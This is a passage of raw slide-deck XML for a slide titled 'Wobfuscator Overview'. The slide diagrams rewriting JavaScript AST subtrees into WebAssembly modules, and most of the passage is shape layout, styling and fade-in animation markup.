          <a:solidFill>
            <a:srgbClr val="BAF8FF"/>
          </a:solidFill>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0071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43" name="Google Shape;343;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6356826" y="2974910"/>
            <a:ext cx="270000" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BAF8FF"/>
          </a:solidFill>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0071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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="344" name="Google Shape;344;p35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="342" idx="5"/>
            <a:endCxn id="343" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6320933" y="2800594"/>
            <a:ext cx="171000" cy="174300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00717D"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Google Shape;345;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6026319" y="2518931"/>
            <a:ext cx="661008" cy="798581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00717D"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6356823" y="1970843"/>
            <a:ext cx="134024" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00717D"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726183" y="1371600"/>
            <a:ext cx="2619048"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3. Rewrite AST subtrees and generate WebAssembly modules</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="348" name="Google Shape;348;p35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7019767" y="2130682"/>
            <a:ext cx="996428" cy="1146175"/>
            <a:chOff x="10256325" y="1058001"/>
            <a:chExt cx="1328571" cy="1528233"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="349" name="Google Shape;349;p35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10436325" y="1058001"/>
              <a:ext cx="1148571" cy="1280583"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EBE6FA"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="81000" tIns="81000" rIns="27000" bIns="4570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Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1050" b="1" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>module</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>  (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1050" b="1" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>memory</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>   ...)</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>  (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1050" b="1" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1050" b="0" i="0" u="none" strike="noStrike" cap="none">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolat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chemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Inconsolata"/>
                  <a:ea typeface="Inconsolata"/>
                  <a:cs typeface="Inconsolata"/>
                  <a:sym typeface="Inconsolata"/>
                </a:rPr>
                <a:t>   ...)</a:t>
              </a:r>
              <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="350" name="Google Shape;350;p35"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10256325" y="2090934"/>
              <a:ext cx="495300" cy="495300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6712788" y="2307008"/>
            <a:ext cx="33427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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5406927" y="3657600"/>
            <a:ext cx="125178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Rewritten JavaScript AST</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6971163" y="3657600"/>
            <a:ext cx="125178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WebAssembly</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Google Shape;354;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198366" y="182880"/>
            <a:ext cx="8520600" cy="7522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Wobfuscator Overview</a:t>
            </a:r>
            <a:endParaRPr sz="32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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="326"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="330"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="330"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="314"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="314"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="327"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="331"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="332"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="332"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="329"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="33" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="328"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="36" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="334"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="334"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="39" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="336"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="336"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="42" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="337"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="337"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="45" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="338"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="338"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="340"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="51" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="341"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="341"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="54" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="342"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="342"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="57" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="343"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="343"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="344"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="344"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="63" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
